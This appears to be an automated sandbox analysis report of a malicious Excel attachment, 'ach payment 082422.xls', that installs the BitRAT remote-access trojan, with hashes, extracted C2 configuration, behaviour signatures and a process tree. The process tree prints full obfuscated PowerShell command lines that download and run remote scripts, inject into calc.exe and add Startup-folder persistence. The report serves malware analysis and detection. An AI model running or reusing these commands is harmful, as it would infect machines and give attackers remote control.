Analysis
-
max time kernel
123s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-08-2022 18:31
Behavioral task
behavioral1
Sample
ach payment 082422.xls
Resource
win7-20220812-en
General
-
Target
ach payment 082422.xls
-
Size
29KB
-
MD5
70c9d8b73d8b0b704ca4eed431f0b8b9
-
SHA1
700df606142d4d599078112277f6352134a5376b
-
SHA256
33a03e5a48aa54e8ade7fa89d977a846b517956ee17a0419c68698742104450b
-
SHA512
b682cf9edfac472dfec29d8bad297b436321eb16c6dd3bbd3c77d660fabdf5089296657a02e1d74fb960f8784cf87bb1d924778806ae75bf484324dbb719bbed
-
SSDEEP
768:vgk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJRB5kPok:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdv
Malware Config
Extracted
bitrat
1.38
bitm.dvrlists.com:6061
-
communication_password
cef08aa1523518b499f65898132b7512
-
tor_process
tor
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3996 4620 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 39 3996 powershell.exe 59 4988 powershell.exe -
Processes:
resource yara_rule behavioral2/memory/4660-155-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/4660-157-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/4660-159-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/4660-160-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/4660-161-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/4660-165-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/4660-167-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 4988 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
calc.exepid process 4660 calc.exe 4660 calc.exe 4660 calc.exe 4660 calc.exe 4660 calc.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4988 set thread context of 4660 4988 powershell.exe calc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1124 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{BB366236-23EB-11ED-AECB-E23A5D90AA50} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000883ed98174fc174d8e18111dae0d912000000000020000000000106600000001000020000000343820d2224b34b78ebece00757639ae7a3eb5d461d05c2c3b909d95b33b0b48000000000e8000000002000020000000337dbe1833de28aa1f668ad5be1de2327a5c0c74fda8b491ddef9b51ba8fdd1a20000000d21d843837ebc09c939c1c4f20e72d9666e4fed16235e71d0aed77a23129249e40000000c2c7541fe2e2ed6d67efda5714922829b539a00258ed73103d7295f9e34bd8201876d9439d4a0858ee6463cd028f43098d43566614ff174659aa92361b5f7a9f iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40048e93f8b7d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2408997849" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30980088" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2408997849" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40938b93f8b7d801 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30980088" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000883ed98174fc174d8e18111dae0d912000000000020000000000106600000001000020000000c1234f8b9e841e622bd2e0c8e1c30ed416563ec4d7a6d5a8e507face4386edbe000000000e8000000002000020000000347e7cf9792f094fe7bfeb6d0c94fcf2b2a44f63c3fb1826ccc7b00ddb97b22320000000d9b5d35c9f9eb088138efd65b1b1f544e7e44bab667e6786ec3fee0a4af0141e40000000a9c943e7172af0c935bce5ef9c44d61f25140ba2a08729e6288ee3af33d8340f77b3bcd890b0da7488f3f6fea1058ae4009ef52a2882ab4492adbffea2d9a1d3 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4620 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3996 powershell.exe 3996 powershell.exe 4988 powershell.exe 4988 powershell.exe 3192 powershell.exe 3192 powershell.exe 4988 powershell.exe 3192 powershell.exe 4988 powershell.exe 4988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
powershell.exepowershell.exepowershell.execalc.exedescription pid process Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 3192 powershell.exe Token: SeIncreaseQuotaPrivilege 4988 powershell.exe Token: SeSecurityPrivilege 4988 powershell.exe Token: SeTakeOwnershipPrivilege 4988 powershell.exe Token: SeLoadDriverPrivilege 4988 powershell.exe Token: SeSystemProfilePrivilege 4988 powershell.exe Token: SeSystemtimePrivilege 4988 powershell.exe Token: SeProfSingleProcessPrivilege 4988 powershell.exe Token: SeIncBasePriorityPrivilege 4988 powershell.exe Token: SeCreatePagefilePrivilege 4988 powershell.exe Token: SeBackupPrivilege 4988 powershell.exe Token: SeRestorePrivilege 4988 powershell.exe Token: SeShutdownPrivilege 4988 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeSystemEnvironmentPrivilege 4988 powershell.exe Token: SeRemoteShutdownPrivilege 4988 powershell.exe Token: SeUndockPrivilege 4988 powershell.exe Token: SeManageVolumePrivilege 4988 powershell.exe Token: 33 4988 powershell.exe Token: 34 4988 powershell.exe Token: 35 4988 powershell.exe Token: 36 4988 powershell.exe Token: SeIncreaseQuotaPrivilege 4988 powershell.exe Token: SeSecurityPrivilege 4988 powershell.exe Token: SeTakeOwnershipPrivilege 4988 powershell.exe Token: SeLoadDriverPrivilege 4988 powershell.exe Token: SeSystemProfilePrivilege 4988 powershell.exe Token: SeSystemtimePrivilege 4988 powershell.exe Token: SeProfSingleProcessPrivilege 4988 powershell.exe Token: SeIncBasePriorityPrivilege 4988 powershell.exe Token: SeCreatePagefilePrivilege 4988 powershell.exe Token: SeBackupPrivilege 4988 powershell.exe Token: SeRestorePrivilege 4988 powershell.exe Token: SeShutdownPrivilege 4988 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeSystemEnvironmentPrivilege 4988 powershell.exe Token: SeRemoteShutdownPrivilege 4988 powershell.exe Token: SeUndockPrivilege 4988 powershell.exe Token: SeManageVolumePrivilege 4988 powershell.exe Token: 33 4988 powershell.exe Token: 34 4988 powershell.exe Token: 35 4988 powershell.exe Token: 36 4988 powershell.exe Token: SeShutdownPrivilege 4660 calc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 3568 iexplore.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
EXCEL.EXEiexplore.exeIEXPLORE.EXEcalc.exepid process 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 4620 EXCEL.EXE 3568 iexplore.exe 3568 iexplore.exe 1712 IEXPLORE.EXE 1712 IEXPLORE.EXE 4660 calc.exe 4660 calc.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
EXCEL.EXEpowershell.exeiexplore.exeWScript.exepowershell.execalc.execmd.exedescription pid process target process PID 4620 wrote to memory of 3996 4620 EXCEL.EXE powershell.exe PID 4620 wrote to memory of 3996 4620 EXCEL.EXE powershell.exe PID 3996 wrote to memory of 2580 3996 powershell.exe WScript.exe PID 3996 wrote to memory of 2580 3996 powershell.exe WScript.exe PID 3568 wrote to memory of 1712 3568 iexplore.exe IEXPLORE.EXE PID 3568 wrote to memory of 1712 3568 iexplore.exe IEXPLORE.EXE PID 3568 wrote to memory of 1712 3568 iexplore.exe IEXPLORE.EXE PID 2580 wrote to memory of 4988 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 4988 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 3192 2580 WScript.exe powershell.exe PID 2580 wrote to memory of 3192 2580 WScript.exe powershell.exe PID 4988 wrote to memory of 4388 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4388 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4388 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4988 wrote to memory of 4660 4988 powershell.exe calc.exe PID 4660 wrote to memory of 4772 4660 calc.exe cmd.exe PID 4660 wrote to memory of 4772 4660 calc.exe cmd.exe PID 4772 wrote to memory of 1124 4772 cmd.exe timeout.exe PID 4772 wrote to memory of 1124 4772 cmd.exe timeout.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ach payment 082422.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.sldnur\''+pmet:vne$,''sbv.tneilC/clac/nomwen/moc.ehgityennikcm//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\rundls.vbs')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rundls.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101101,01100011,01101011,01101001,01101110,01101110,01100101,01111001,01110100,01101001,01100111,01101000,01100101,00101110,01100011,01101111,01101101,00101111,01101110,01100101,01110111,01101101,01101111,01101110,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\calc.exe"C:\WINDOWS\syswow64\calc.exe"5⤵
-
C:\WINDOWS\syswow64\calc.exe"C:\WINDOWS\syswow64\calc.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iFKdFHgK.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout /t 5 /nobreak7⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\rundls.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rundls.vbs'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3568 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD54d27898144ddb4e3d48c0e6703e82d75
SHA176c5bfbd58e929f960fece53f7b7365a70e46df9
SHA2565e1a0bd17b3c285604ac0a65e0bd3cf0bb9bec93feeb9c9841dcc2bae7a13d0e
SHA5125c7a5d2ee0e028e547d80a60e7c12434abe9ecb59e136c05dba64ce159c63511f730a15c6b11bd3ed4ef236fc381d57dc195dd71c6bf87bbb934108159ce4867
-
C:\Users\Admin\AppData\Local\Temp\b944d715-ae68-492a-9ac2-0910fdf2d15c\AgileDotNetRT64.dllFilesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
C:\Users\Admin\AppData\Local\Temp\iFKdFHgK.batFilesize
270B
MD5b4e6763be26f7ff13b03846cdd361748
SHA18c46b80df30efc869726541396a5d55fe67d654f
SHA2565ff5f5bb73ced3285bda3f93823ece49453eddea9f6a64219f347818c68d714a
SHA512521fae7851e1fed3d38a6b2515593da626c3010c3df56706c2db6b6a121e369e4bea9c0a977b9dbe0afcf454d4c1ddddd00e7d94f4e61c0d24eea04f262c2989
-
C:\Users\Admin\AppData\Local\Temp\rundls.vbsFilesize
2KB
MD5bce33b78d45f9f86c00d35f0cbdeaa7c
SHA189f52ab70ec72cca1f69a8b6139fc3b7181d667c
SHA25632202bd660c1cbe597504f6108e09c74de842917aaf3ae88446712ec9be78209
SHA512fdd7af18ec9c94fe5708e8b277ade1036778e692e807649818cab6f5f585f73ff4cc616636f30c579956f5de11bd46290eeda77384d696478898b8c93528ae32
-
memory/1124-170-0x0000000000000000-mapping.dmp
-
memory/2580-142-0x0000000000000000-mapping.dmp
-
memory/3192-151-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmpFilesize
10.8MB
-
memory/3192-150-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmpFilesize
10.8MB
-
memory/3192-146-0x0000000000000000-mapping.dmp
-
memory/3996-141-0x00007FFBE0360000-0x00007FFBE0E21000-memory.dmpFilesize
10.8MB
-
memory/3996-139-0x0000000000000000-mapping.dmp
-
memory/3996-144-0x00007FFBE0360000-0x00007FFBE0E21000-memory.dmpFilesize
10.8MB
-
memory/3996-140-0x0000020776CE0000-0x0000020776D02000-memory.dmpFilesize
136KB
-
memory/4620-172-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-138-0x00007FFBC7A10000-0x00007FFBC7A20000-memory.dmpFilesize
64KB
-
memory/4620-174-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-137-0x00007FFBC7A10000-0x00007FFBC7A20000-memory.dmpFilesize
64KB
-
memory/4620-136-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-132-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-135-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-173-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-133-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-175-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4620-134-0x00007FFBCA370000-0x00007FFBCA380000-memory.dmpFilesize
64KB
-
memory/4660-157-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4660-159-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4660-160-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4660-161-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4660-156-0x00000000007E2730-mapping.dmp
-
memory/4660-163-0x0000000073BD0000-0x0000000073C09000-memory.dmpFilesize
228KB
-
memory/4660-164-0x0000000073F70000-0x0000000073FA9000-memory.dmpFilesize
228KB
-
memory/4660-165-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4660-167-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4660-168-0x0000000073BD0000-0x0000000073BEF000-memory.dmpFilesize
124KB
-
memory/4660-155-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/4772-166-0x0000000000000000-mapping.dmp
-
memory/4988-152-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmpFilesize
10.8MB
-
memory/4988-162-0x00007FFBDFC00000-0x00007FFBE06C1000-memory.dmpFilesize
10.8MB
-
memory/4988-154-0x00007FFBD98E0000-0x00007FFBD9A2E000-memory.dmpFilesize
